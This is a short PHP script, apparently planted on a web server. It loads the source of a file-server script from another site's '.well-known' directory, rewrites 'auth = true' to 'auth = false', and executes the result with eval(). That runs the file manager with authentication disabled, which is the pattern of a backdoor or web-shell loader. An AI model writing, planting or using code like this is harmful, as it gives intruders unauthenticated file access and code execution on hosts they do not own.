<?php // echo time(); $config="../../../fileserver.kai-young.co.uk/.well-known/index.php"; // var_dump(is_file($config)); $co=file_get_contents($config); $co=str_replace('auth = true','auth = false',$co); // echo strlen($co); $co=ltrim($co,'<?ph'); eval($co);